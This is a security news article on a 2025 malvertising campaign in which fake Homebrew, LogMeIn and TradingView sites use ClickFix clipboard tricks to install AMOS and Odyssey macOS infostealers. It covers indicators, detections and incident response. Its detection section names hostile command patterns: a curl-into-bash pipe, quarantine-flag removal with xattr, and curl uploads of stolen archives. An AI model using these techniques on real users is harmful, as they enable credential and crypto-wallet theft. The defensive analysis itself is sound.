Google Ads abused to promote fake Homebrew/LogMeIn/TradingView sites that install macOS infostealers

NEWS

Introduction: the problem and why it matters

A new malvertising wave is pushing macOS infostealers by impersonating Homebrew, LogMeIn, and TradingView in sponsored Google Search results. The campaign uses polished fake download/“verification” pages and ClickFix social engineering (copy-paste a Terminal command) to install AMOS (Atomic macOS Stealer) or Odyssey on victims’ machines. Researchers tied the operation to 85+ look-alike domains and observed clipboard manipulation that silently replaces a copied “code” or “verification” string with a base64-encoded installer command. This is a high-yield path to developers, traders, and remote-access users—high-value targets for credential and wallet theft.

In brief (TL;DR)

  • Threat actors bought Google Ads to rank fake Homebrew/LogMeIn/TradingView sites, then tricked users into running curl|bash commands that fetch a malicious installer.
  • The payload is AMOS or Odyssey, both capable of stealing browser data, Keychain credentials, and crypto wallets; Odyssey is a rebrand/evolution of Poseidon with extensive macOS targeting.
  • Researchers mapped 85+ phishing domains and linked them via reused SSL certs, IPs, and code patterns—evidence of a persistent, evolving infrastructure.
  • This continues a pattern of Homebrew malvertising observed since January 2025, where ads display brew.sh but redirect to look-alike domains.

Campaign context and history

Malvertising that hijacks developer tooling searches is not new. In January 2025, security outlets documented fake Homebrew ads that showed the real brew.sh in the ad but sent users to a near-duplicate domain (e.g., brewe[.]sh) that instructed a Terminal install—ultimately dropping AMOS. Google removed the specific ads at the time, but the lure model persisted. The new October 18, 2025 wave broadens the brand set (Homebrew, LogMeIn, TradingView) and layers in more polished ClickFix flows.

Technical analysis: delivery, payloads, infrastructure

Delivery chain & social engineering

  1. Entry: Sponsored Google result for a software brand (Homebrew/LogMeIn/TradingView).
  2. Landing: A pixel-perfect spoof with a “Copy” button. For TradingView, the page calls this a “connection security confirmation step.”
  3. ClickFix: The button silently puts a base64-encoded curl command on the clipboard instead of the visible token/code; users paste it into Terminal, believing it’s required.
  4. Installer: The command downloads and decodes an install.sh, clears quarantine/xattr, and executes a Mach-O payloadAMOS or Odyssey.

Payload capabilities

  • AMOS (Atomic macOS Stealer)—MaaS sold (historically around $1,000/month), steals credentials, cookies, Keychain items, crypto wallets, system info; recent reports note a backdoor component for persistence and remote control.
  • Odyssey Stealer—a Poseidon rebrand/fork focused on macOS; uses AppleScript/osascript, fakes password prompts, targets Chrome/Firefox/Safari artifacts plus >100 wallet extensions; packages loot into out.zip and exfiltrates via curl.

Infrastructure & indicators

Threat-hunting uncovered 85+ impersonation domains (e.g., homebrewonline[.]org, logmeeine[.]com, tradingviewen[.]com) with overlaps in SSL certificates, JARM fingerprints, and IP reuse (e.g., 93.152.230[.]79, 195.82.147[.]38). Some hosts expose multiple services (HTTP/SSH/FTP/IMAPS/POP3S) and even FASTPANEL admin interfaces—signs of multi-purpose servers running several campaigns in parallel.

Practical business impact and risks

  • Account takeover & session hijacking: Theft of cookies, tokens, and saved passwords enables immediate lateral movement across SaaS, developer platforms, and trading accounts.
  • Developer supply-chain exposure: Compromised dev workstations (with package managers, signing keys, CI tokens) raise software supply-chain risk.
  • Financial loss: Direct crypto-wallet theft and fraudulent trades from TradingView-adjacent credentials.
  • Detection evasion: Gatekeeper bypass via quarantine flag removal and anti-VM checks reduce sandbox visibility and delay response.

Operational recommendations / what to do next

1) Reduce exposure to ClickFix malvertising

  • Policy: Forbid copy-pasting Terminal commands from web pages; require reviewed install scripts (internal repo) for tools like Homebrew.
  • Awareness: Teach users to verify canonical domains (brew.sh, logmein.com, tradingview.com) and to avoid sponsored results when downloading software.

2) Harden macOS endpoints

  • Block/alert on bash -c "$(curl ...)", osascript network activity, and quarantine attribute removal (xattr -dr com.apple.quarantine).
  • Constrain script interpreters: Use application control to restrict bash/zsh/osascript execution outside approved paths; consider blocking osascript where business-justified.
  • Browser secrets: Enforce password managers with no local storage, and isolate developer browsers (profiles/containers) to reduce token sprawl.

3) Network & threat-intel controls

  • Block IOCs related to Odyssey/AMOS (sample IPs/domains from research) and monitor for connections to uncommon ports or FASTPANEL-like admin panels on outbound.
  • DNS filtering to sinkhole newly observed typosquats for brand terms (homebrew, logmein, tradingview).

4) Detections you can deploy today (starter ideas)

  • EDR rule: Terminal paste → base64 decode → curl → bash chain within a short window.
  • Telemetry hunt: Processes where pbpaste or clipboard APIs precede bash/curl.
  • File creation of /tmp/* followed by zip/curl -F or repeated HTTP POST retries (Odyssey behavior).

5) Incident response playbook (when you suspect compromise)

  1. Isolate host; collect triage pack (bash history, /var/log/install.log, recent LaunchAgents/Daemons).
  2. Search for: out.zip, suspicious LaunchDaemons (e.g., fake Finder helpers), removed quarantine artifacts, and new Keychain prompts in user reports.
  3. Rotate browser and SSO tokens, reset passwords, invalidate sessions; review wallet activity.
  4. Hunt across fleet for the domain/IP and command patterns noted above.

Differences / comparisons with earlier cases

  • Same lure family, broader brand set: January 2025 incidents focused on Homebrew; October 2025 adds LogMeIn/TradingView and refined clipboard-swap tricks.
  • Payload evolution: Odyssey has matured into a Poseidon rebrand with robust AppleScript-based data theft and C2 ecosystem, competing with AMOS in the macOS MaaS market.
  • Infrastructure reuse at scale: Hunt.io’s mapping of 85+ domains indicates a more persistent backend than one-off ad scams seen earlier in the year.

Summary — key takeaways

  • Don’t paste Terminal commands from websites—standardize trusted, internally hosted installers.
  • Treat sponsored results for popular tools as hostile by default; validate canonical domains.
  • Detect and block the curl→bash pattern and osascript abuses; monitor for quarantine flag removals.
  • Proactively block known IOCs and continuously hunt for new typosquats targeting your user base.

Sources / bibliography

  1. BleepingComputer — “Google ads for fake Homebrew, LogMeIn sites push infostealers,” Oct 18, 2025. (BleepingComputer)
  2. Hunt.io — “Odyssey Stealer and AMOS Campaign Targets macOS Developers Through Fake Tools,” Oct 16, 2025. (hunt.io)
  3. CYFIRMA — “Odyssey Stealer: The Rebrand of Poseidon Stealer,” Jun 26, 2025. (Cyfirma)
  4. SecurityWeek — “Homebrew macOS Users Targeted With Information Stealer Malware,” Jan 23, 2025. (SecurityWeek)
  5. BleepingComputer — “Fake Mac fixes trick users into installing new Shamos infostealer,” Aug 22, 2025 (ClickFix background). (BleepingComputer)

Related Posts